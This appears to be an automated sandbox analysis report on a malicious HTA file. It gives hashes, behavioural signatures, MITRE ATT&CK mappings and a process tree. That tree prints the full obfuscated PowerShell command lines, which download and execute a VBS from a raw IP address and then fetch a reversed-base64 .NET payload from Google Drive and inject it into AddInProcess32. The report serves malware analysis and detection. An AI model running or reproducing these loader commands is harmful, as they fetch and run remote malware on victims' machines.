b8e2fc58afa34cd0e92aa8a763d8cd49e240b47330eb2da9651e04150bd04948

General

Target

nicegirlwithnewthingswhichevennobodknowthatkissingme.hta
Size

130KB
MD5

401fa9878282b2404925d1ac2599b7c0
SHA1

876d5ea4b89ef48cd614fc098154e3e2caa176f3
SHA256

b8e2fc58afa34cd0e92aa8a763d8cd49e240b47330eb2da9651e04150bd04948
SHA512

45e2de1e196ae5339df31581bd8e98af094ab461f80269a815f369e51e131a885bb9745c60375aa4c95db75e82d58f799c5ae480ac2aa0b8387baa2aea2d0f63
SSDEEP

96:Eam73bDpMZMY9pMZMUyOX/DJfqMtJNpMZMVx7T:Ea23bDCuY9Cuitht/CuV9T

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

PoWErSHEll.EXEpowershell.exe

flow pid process

4 1664 PoWErSHEll.EXE
6 2576 powershell.exe
8 2576 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2504 powershell.exe
2576 powershell.exe
Evasion via Device Credential Deployment 2 IoCs
defense_evasion execution

Processes:

PoWErSHEll.EXEpowershell.exe

pid process

1664 PoWErSHEll.EXE
2536 powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

5 drive.google.com
6 drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	pid	process
4	1664	PoWErSHEll.EXE
6	2576	powershell.exe
8	2576	powershell.exe

pid	process
2504	powershell.exe
2576	powershell.exe

pid	process
1664	PoWErSHEll.EXE
2536	powershell.exe

flow	ioc
5	drive.google.com
6	drive.google.com

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

PoWErSHEll.EXEpowershell.execsc.execvtres.exeWScript.exepowershell.exepowershell.exemshta.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PoWErSHEll.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

PoWErSHEll.EXEpowershell.exepowershell.exepowershell.exe

pid process

1664 PoWErSHEll.EXE
2536 powershell.exe
1664 PoWErSHEll.EXE
1664 PoWErSHEll.EXE
2504 powershell.exe
2576 powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
1664	PoWErSHEll.EXE
2536	powershell.exe
1664	PoWErSHEll.EXE
1664	PoWErSHEll.EXE
2504	powershell.exe
2576	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

PoWErSHEll.EXEpowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1664	PoWErSHEll.EXE
Token: SeDebugPrivilege	2536	powershell.exe
Token: SeDebugPrivilege	2504	powershell.exe
Token: SeDebugPrivilege	2576	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

mshta.exePoWErSHEll.EXEcsc.exeWScript.exepowershell.exe

description	pid	process	target process
PID 2432 wrote to memory of 1664	2432	mshta.exe	PoWErSHEll.EXE
PID 2432 wrote to memory of 1664	2432	mshta.exe	PoWErSHEll.EXE
PID 2432 wrote to memory of 1664	2432	mshta.exe	PoWErSHEll.EXE
PID 2432 wrote to memory of 1664	2432	mshta.exe	PoWErSHEll.EXE
PID 1664 wrote to memory of 2536	1664	PoWErSHEll.EXE	powershell.exe
PID 1664 wrote to memory of 2536	1664	PoWErSHEll.EXE	powershell.exe
PID 1664 wrote to memory of 2536	1664	PoWErSHEll.EXE	powershell.exe
PID 1664 wrote to memory of 2536	1664	PoWErSHEll.EXE	powershell.exe
PID 1664 wrote to memory of 1884	1664	PoWErSHEll.EXE	csc.exe
PID 1664 wrote to memory of 1884	1664	PoWErSHEll.EXE	csc.exe
PID 1664 wrote to memory of 1884	1664	PoWErSHEll.EXE	csc.exe
PID 1664 wrote to memory of 1884	1664	PoWErSHEll.EXE	csc.exe
PID 1884 wrote to memory of 2232	1884	csc.exe	cvtres.exe
PID 1884 wrote to memory of 2232	1884	csc.exe	cvtres.exe
PID 1884 wrote to memory of 2232	1884	csc.exe	cvtres.exe
PID 1884 wrote to memory of 2232	1884	csc.exe	cvtres.exe
PID 1664 wrote to memory of 2700	1664	PoWErSHEll.EXE	WScript.exe
PID 1664 wrote to memory of 2700	1664	PoWErSHEll.EXE	WScript.exe
PID 1664 wrote to memory of 2700	1664	PoWErSHEll.EXE	WScript.exe
PID 1664 wrote to memory of 2700	1664	PoWErSHEll.EXE	WScript.exe
PID 2700 wrote to memory of 2504	2700	WScript.exe	powershell.exe
PID 2700 wrote to memory of 2504	2700	WScript.exe	powershell.exe
PID 2700 wrote to memory of 2504	2700	WScript.exe	powershell.exe
PID 2700 wrote to memory of 2504	2700	WScript.exe	powershell.exe
PID 2504 wrote to memory of 2576	2504	powershell.exe	powershell.exe
PID 2504 wrote to memory of 2576	2504	powershell.exe	powershell.exe
PID 2504 wrote to memory of 2576	2504	powershell.exe	powershell.exe
PID 2504 wrote to memory of 2576	2504	powershell.exe	powershell.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\nicegirlwithnewthingswhichevennobodknowthatkissingme.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2432
- C:\Windows\SysWOW64\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE
  "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1664
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2536
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jopjqnsa.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1884
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA362.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA361.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2232
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2700
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKDBRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl04OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2504
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2576

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESA362.tmp

Filesize
1KB

MD5
4cfcc1f631467b3b484dc3b139ec13c1

SHA1
c8d7899bfeb362d784773293568379ce9ebe2204

SHA256
029295182690b50c26dce88fdad57bce5c35907dc5942cb7735380c24d790d00

SHA512
334c8467827d5e63820ac8bf5c984b968c74632564c9f540e9a8e30be71a6aef7e8564af0e0e5773f5124cab1255e1c850b376adc1c9f31d2e5841116bce7e51

Download Submit
C:\Users\Admin\AppData\Local\Temp\jopjqnsa.dll

Filesize
3KB

MD5
67822799cfa66847dababa6709b800c8

SHA1
eed42493c03edbbaa64901436d32145b200d5ad7

SHA256
2c0b9d4efcb5b52f7c6c4210ed04e993808ab73581d255aedf912c5182976de8

SHA512
a0d7a7d2a099b9089d92ece83a91d8fba4c09f93fb89809dc840a832d8c1b80e1fccfdbafc1e8451761e6c3fb1fc87597b947b9c974b40f6ea2e95a804cc0a04

Download Submit
C:\Users\Admin\AppData\Local\Temp\jopjqnsa.pdb

Filesize
7KB

MD5
07a6ed8becd23efbf613e347f9658289

SHA1
e72aebef1b9b9d871a0b81e7ffb4039912cbf7bb

SHA256
3342d9e5311731887cf35433242e958c634bb4c8cc61751d4dd4a365f3b0a33a

SHA512
ae50643dc16e3b65609e621a072d62e05a6b0c7ccce72549d2a18163c75560b97359485884d5268f0ca05acded98b788a24ce93a23b147cb8f8b795c350a690a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QNOEEJDN9QVDD5MY5EEW.temp

Filesize
7KB

MD5
2939b3fde9f55025430d2418aaf1b2c9

SHA1
1197ad9f7a60dee575fc983ef595cde1959fa9bf

SHA256
518efc6f5792103f93a205f53e211324898fb81954d077c38cb717a9aa593b11

SHA512
0bd651d65883a626adf6e523d599afe0f3e68ea290fbd1aa8af93e4f62f1bdb55e6e53b15234acb70376c54f0cd76a2311d117bf912babcd44b8f44e70ec6e54

Download Submit
C:\Users\Admin\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS

Filesize
137KB

MD5
fe9e18e3366ca7ac8c21eb1ce0631d9c

SHA1
51bc2bc37e87e2d64129cad63df697a68ee3b9d6

SHA256
01c6399fc31b4cbfcf8e851ff3ff433d36b46da2577f9230b9c78b2cbf790912

SHA512
7dca4fb22f5f1a6e08f6c993a7b159863b8b1a8898429aed78582641bc2340ce2fbe3e92f6ec5f9d6ec5c74a14009f77ce87602bea7ba59c4ea1e092d5a9f8f7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCA361.tmp

Filesize
652B

MD5
38e45cac84da4e2be691807f9941489e

SHA1
1c05ad77d6192a4d4bf1e36ac8be44122a63a5c1

SHA256
1d72730df19eb3505d7b5ca7b27f75adbc30e510fe0504280795e495dd80205b

SHA512
30e889ff7127ee91deb55f05d5f06ff743846d1b6353df65296ee9a88e3903fcada1d184a854f7098a5412dc61da7e6f8a34e855199da6947db18f6182ed4013

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jopjqnsa.0.cs

Filesize
471B

MD5
465b774d7a1a641088ff65cb56d1755b

SHA1
d65ff3c3ecd67b7da02d199d649abb75a8c64879

SHA256
737ceb1cff20744c7d2eb5139717221cf2c96f10d05d5fffd3d916fd69a6d025

SHA512
665f11dfa5a6a79b89c49724ad1943baea2ea54cb204ef3712abb948218064410b42ee96b29f067fc635bc71ec85295603567bf2e9121d381fa2dfbc6c07ea68

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jopjqnsa.cmdline

Filesize
309B

MD5
b276a128b1f3a59553f00833e7688688

SHA1
cfafcc938d5caa4dcb6416b4b87a75da54db2df5

SHA256
f345be10368217cd1e44ac4c5bc7e924253a6661eb87a322514af6191a5cccd6

SHA512
016b2e0c62de696b20496082589301b415546678d55c85e07e5fe02d3cf0af655d1a7e9b638ba60cbd1b46aa711149bb1573094320f65d8c5290b020a39c41aa

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads